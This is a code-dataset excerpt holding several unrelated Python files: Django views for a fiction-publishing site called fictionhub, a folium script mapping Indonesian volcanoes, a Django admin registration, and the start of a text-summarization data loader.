'hubs':hubs,\n })\n\n\ndef story_create(request):\n if request.method == 'POST':\n form = StoryForm(request.POST)\n if form.is_valid():\n story = form.save(commit=False) # return story but don't save it to db just yet\n story.author = request.user\n # self upvote\n story.score += 1\n story.save()\n request.user.upvoted.add(story) \n story.hubs.add(*form.cleaned_data['hubs'])\n hubs = story.hubs.all()\n for hub in hubs:\n if hub.parent:\n story.hubs.add(hub.parent)\n # 
Hacky way to \n # for hub in form.cleaned_data['hubs']:\n # if hub.parent:\n # story.hubs.add(hub.parent)\n # if hub.parent.parent:\n # story.hubs.add(hub.parent.parent)\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n else:\n form = StoryForm()\n form.fields[\"hubs\"].queryset = Hub.objects.filter(children=None).order_by('id')\n\n return render(request, 'stories/story-create.html', {\n 'form':form,\n 'hubs':Hub.objects.all()\n })\n\n\ndef chapter_create(request, story):\n story = Story.objects.get(slug=story) \n if request.method == 'POST':\n form = ChapterForm(request.POST)\n if form.is_valid():\n # return HttpResponseRedirect('/asdf') \n chapter = form.save(commit=False) # return story but don't save it to db just yet\n chapter.story = story\n chapter.number = story.chapters.count()+1\n chapter.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/edit')\n else:\n form = ChapterForm()\n \n return render(request, 'stories/edit.html', {\n 'story':story, \n 'form':form,\n 'action':'chapter_create' \n })\n\n\ndef story_edit(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n if request.method == 'POST':\n form = StoryForm(request.POST,instance=story)\n if form.is_valid():\n story = form.save(commit=False) # return story but don't save it to db just yet\n story.save()\n story.hubs = []\n story.hubs.add(*form.cleaned_data['hubs'])\n hubs = story.hubs.all()\n for hub in hubs:\n if hub.parent:\n story.hubs.add(hub.parent)\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n else:\n form = StoryForm(instance=story)\n form.fields[\"hubs\"].queryset = Hub.objects.filter(children=None).order_by('id') \n \n return render(request, 'stories/edit.html', {\n 'story':story,\n 'form':form,\n 'action':'story_edit'\n })\n\ndef chapter_edit(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n \n if request.method == 'POST':\n form = ChapterForm(request.POST,instance=chapter)\n if form.is_valid():\n chapter = form.save(commit=False) # return story but don't save it to db just yet\n chapter.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/edit')\n else:\n form = ChapterForm(instance=chapter)\n \n return render(request, 'stories/edit.html', {\n 'story':story,\n 'chapter':chapter,\n 'form':form,\n 'action':'chapter_edit' \n })\n\ndef chapter_up(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n try:\n following_chapter = story.chapters.get(number=chapter.number+1)\n following_chapter.number -= 1\n following_chapter.save()\n except:\n pass\n\n chapter.number += 1\n chapter.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER')) \n\ndef chapter_down(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n if chapter.number > 0: \n try:\n following_chapter = 
story.chapters.get(number=chapter.number-1)\n following_chapter.number += 1\n following_chapter.save()\n except:\n pass\n\n chapter.number -= 1\n chapter.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef chapter_delete(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n chapter.delete()\n return HttpResponseRedirect('/story/'+story.slug+'/edit') \n\ndef story_delete(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.delete()\n return HttpResponseRedirect('/') # to story list\n\ndef story_publish(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.published = True\n story.save()\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n\ndef story_unpublish(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.published = False\n story.save()\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n\n\n\n\ndef page_404(request):\n response = render_to_response('404.html', {},\n context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef story_feed(request, story):\n story = Story.objects.get(slug=story)\n rss = Element('rss')\n rss.set(\"version\",\"2.0\")\n\n channel = SubElement(rss,'channel')\n\n title = SubElement(channel,'title')\n title.text = story.title\n\n link = SubElement(channel,'link')\n link.text = \"http://fictionhub.io/story/\"+story.slug # request.build_absolute_uri(reverse(\"story\"))\n\n desc = SubElement(channel,'description')\n desc.text = story.description\n\n chapters = story.chapters.all()\n\n for index in chapters:\n item = SubElement(channel,'item')\n\n title_c = SubElement(item,'title')\n title_c.text = index.title\n \n link = SubElement(item,'link')\n #link.text = request.build_absolute_uri(index.get_absolute_url())\n link.text = \"http://fictionhub.io/story/\"+story.slug\n return HttpResponse(tostring(rss, encoding='UTF-8'), content_type='application/xml')\n\n\n# Story API. 
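For the JSON story endpoint defined just below, a consumer might look like the following sketch. The URL pattern is invented (no URLconf is shown in this file), and Python 3's urllib stands in for any HTTP client.

import json
from urllib.request import urlopen

# Invented URL; the route to story_json is an assumption.
with urlopen('http://fictionhub.io/story/my-story.json') as resp:
    story = json.loads(resp.read().decode('utf-8'))

print(story['title'], 'by', story['author'])
for chapter in sorted(story['chapters'], key=lambda c: c['number']):
    print(chapter['number'], chapter['title'])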
Replace with REST.\ndef story_json(request, slug):\n try:\n story = Story.objects.get(slug=slug)\n except:\n return HttpResponseRedirect('/404')\n\n res = {}\n res['title'] = story.title\n res['author'] = story.author.username\n res['chapters'] = []\n chapters = story.chapters.all()\n\n for index in chapters:\n res['chapters'].append({\"title\": index.title, \"number\": index.number, \"text\": index.body})\n\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n# import feed\ndef feed_import(request, username):\n feed = feedparser.parse(\"http://orangemind.io/feeds/all.atom.xml\")\n\n author = request.user\n \n for entry in feed.entries:\n import_entry = False\n # Check if story has \"fictionhub\" in it's tags\n if \"tags\" in entry.keys():\n for tag in entry.tags:\n if tag.term == \"fictionhub\":\n import_entry = True\n if import_entry:\n title = entry.title\n slug = entry.link.rsplit('/',1)[-1]\n description = entry.description\n date = datetime.fromtimestamp(mktime(entry.updated_parsed)) \n try:\n # Open existing story\n post = Story.objects.get(slug=slug)\n except:\n # Import story\n post = Story(slug=slug)\n post.score = 1\n \n post.title = title\n post.description = description\n post.date = date\n post.author = author\n for tag in entry.tags:\n # post.title = post.title + \" \" + tag.term\n try:\n hub = Hub.objects.get(slug=tag.term)\n post.hubs.add(hub)\n except:\n pass\n post.imported = True\n post.published = True\n post.save(slug=slug)\n return HttpResponse()\n", "sub_path": "fictionhub/stories/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 20814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "models.Story.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 45, "usage_type": "name"}, {"api_name": "hubs.models.Hub.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "profiles.models.User", "line_number": 55, "usage_type": "argument"}, {"api_name": "models.Story.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 58, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 60, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 63, "usage_type": "name"}, {"api_name": "utils.rank_hot", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.rank_top", "line_number": 69, "usage_type": "call"}, {"api_name": 
"django.core.paginator.Paginator", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 81, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 84, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 100, "usage_type": "name"}, {"api_name": "hubs.models.Hub.objects.all", "line_number": 100, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 117, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 128, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 128, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 140, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 148, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 163, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 165, "usage_type": "call"}, {"api_name": "models.Chapter.objects.get", "line_number": 169, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 169, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 169, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 176, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 176, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 176, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 179, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 184, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 193, "usage_type": "name"}, {"api_name": "comments.forms.CommentForm", "line_number": 196, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 208, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 210, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", 
"line_number": 215, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 218, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 238, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 238, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 238, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 242, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 242, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 242, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 247, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 247, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 247, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 251, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 251, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.rank_hot", "line_number": 257, "usage_type": "call"}, {"api_name": "utils.rank_top", "line_number": 259, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects.get", "line_number": 268, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 268, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 268, "usage_type": "name"}, {"api_name": "comments.utils", "line_number": 273, "usage_type": "name"}, {"api_name": "comments.utils.get_comment_list", "line_number": 273, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 282, "usage_type": "call"}, {"api_name": "comments.utils", "line_number": 292, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 295, "usage_type": "name"}, {"api_name": "models.Story.objects.get", "line_number": 301, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 301, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 302, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 302, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 302, "usage_type": "name"}, {"api_name": "comments.utils", "line_number": 303, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 303, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 303, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 303, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 306, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 306, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 306, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 311, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 311, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 311, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 315, "usage_type": "name"}, {"api_name": "comments.forms.CommentForm", "line_number": 318, "usage_type": "call"}, {"api_name": 
"django.http.HttpResponseRedirect", "line_number": 326, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 328, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 337, "usage_type": "call"}, {"api_name": "comments.utils", "line_number": 344, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 346, "usage_type": "name"}, {"api_name": "forms.StoryForm", "line_number": 352, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 361, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 362, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 371, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 373, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.filter", "line_number": 374, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 374, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 374, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 376, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.all", "line_number": 378, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 378, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 378, "usage_type": "name"}, {"api_name": "models.Story.objects.get", "line_number": 383, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 383, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 383, "usage_type": "name"}, {"api_name": "forms.ChapterForm", "line_number": 385, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 392, "usage_type": "call"}, {"api_name": "forms.ChapterForm", "line_number": 394, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 396, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 404, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 408, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 411, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 417, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 418, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 421, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 423, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.filter", "line_number": 424, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 424, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 424, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 433, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 433, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 433, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 434, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 434, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 434, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 438, "usage_type": 
"call"}, {"api_name": "forms.ChapterForm", "line_number": 441, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 445, "usage_type": "call"}, {"api_name": "forms.ChapterForm", "line_number": 447, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 449, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 457, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 457, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 457, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 458, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 458, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 458, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 462, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 474, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 477, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 477, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 477, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 478, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 478, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 478, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 482, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 495, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 498, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 498, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 498, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 499, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 499, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 499, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 503, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 506, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 509, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 509, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 509, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 513, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 516, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 519, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 519, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 519, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 523, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 527, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 530, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 530, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 530, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 534, "usage_type": "call"}, {"api_name": 
"django.http.HttpResponseRedirect", "line_number": 538, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 544, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 545, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 551, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 551, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 551, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 552, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 555, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 557, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 560, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 563, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 569, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 571, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 574, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 577, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 577, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 583, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 583, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 583, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 585, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 596, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 596, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 601, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 616, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 616, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 616, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 619, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 619, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 619, "usage_type": "name"}, {"api_name": "models.Story", "line_number": 622, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.get", "line_number": 632, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 632, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 632, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 639, "usage_type": "call"}]} +{"seq_id": "258880923", "text": "import folium\nimport pandas\n\ndata = pandas.read_csv(\"gunung.txt\")\nlat = list(data[\"LAT\"])\nlon = list(data[\"LON\"])\ntinggi = list(data[\"TINGGI\"])\nnama = list(data[\"NAMA\"])\n\ndef warna(tinggi):\n\tif tinggi < 1000:\n\t\treturn 'green'\n\telif 1000 < tinggi < 3000:\n\t\treturn 'orange'\n\telse:\n\t\treturn 'red'\n\nmap = folium.Map(location=[-0.526024, 113.693822], zoom_start=5.4, tiles=\"Mapbox Bright\")\nfg = folium.FeatureGroup(name=\"Indonesia\")\n\nfor lt, ln, t, n in zip(lat,lon, tinggi, nama):\n\tfg.add_child(folium.CircleMarker(location=[lt,ln], radius=6, popup=n+\"\\n\"+str(t), fill_color=warna(t), color='grey',fill_opacity=1 
))\n\nmap.add_child(fg)\nmap.save(\"peta-gunung-berapi-indonesia.html\")", "sub_path": "gunung-berapi-indonesia.py", "file_name": "gunung-berapi-indonesia.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 18, "usage_type": "call"}, {"api_name": "folium.FeatureGroup", "line_number": 19, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "598056034", "text": "from django.contrib import admin\nfrom .models import Doodles\n\n\nclass DoodlesAdmin(admin.ModelAdmin):\n list_display = (\n \"name\",\n \"price\",\n \"size\",\n \"time_to_complete\",\n \"image\",\n \"created_at\",\n \"updated_at\",\n )\n ordering = (\"-updated_at\",)\n\n\nadmin.site.register(Doodles, DoodlesAdmin)\n", "sub_path": "doodles/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Doodles", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "378603654", "text": "#/usr/bin/env python\n# -*- coding: utf-8 -*-\n#pylint: skip-file\nimport sys\nimport os\nimport numpy as np\nimport encodings\nimport pkgutil\nimport torch\nfrom nltk.corpus import stopwords\n\ncurr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))\n# for paragraph position\npar_const = 0.5\npar_bar = 4\nforgotten_punct= ['-lrb-', '-rrb-']\ndef all_encodings():\n\tmodnames = set(\n\t\t[modname for importer, modname, ispkg in pkgutil.walk_packages(\n\t\t\tpath=[os.path.dirname(encodings.__file__)], prefix='')])\n\taliases = set(encodings.aliases.aliases.values())\n\treturn modnames.union(aliases)\n\t\ndef load_stop_words():\n return stopwords.words('english')\n\ndef load(f_path):\n\tdic = {}\n\ti2w = {}\n\tw2i = {}\n\tlines = []\n\tw_pos = []\n\t# w_concept = []\n\n\t# load dic\n\tencodings = all_encodings()\n\t# for enc in encodings:\n\t\t# try:\n\t\t\t# with open(filename, encoding=enc) as f:\n\t\t\t\t# # print the encoding and the first 500 characters\n\t\t\t\t# print(enc, f.read(500))\n\t\t# except Exception:\n\t\t\t# pass\n\tchosen_encodings = []\n\tfor enc in encodings:\n\t\ttry:\n\t\t\tf = open(f_path + \".dic\", \"r\", encoding=enc)\n\t\t\tfor line in f:\n\t\t\t\tline\n\t\t\tchosen_encodings.append(enc)\n\t\texcept Exception:\n\t\t\tpass\n\t\t\t\n\t\n\tf = open(f_path + \".dic\", \"r\", encoding=chosen_encodings[0])\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\tfields = line.split(\"=====\")\n\t\tif len(fields) < 2:\n\t\t\tprint(\"Error.\")\n\t\t\tcontinue\n\t\tdic[fields[0]] = float(fields[1])\n\t\ti2w[len(w2i)] = fields[0]\n\t\tw2i[fields[0]] = len(w2i)\n\tf.close()\n\n\t# load sents\n\tf = open(f_path + \".sent\", \"r\", encoding=chosen_encodings[0])\n\ti = 0\n\tsent = 0\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\ti += 1\n\t\tif '***' in line:\n\t\t\t# 
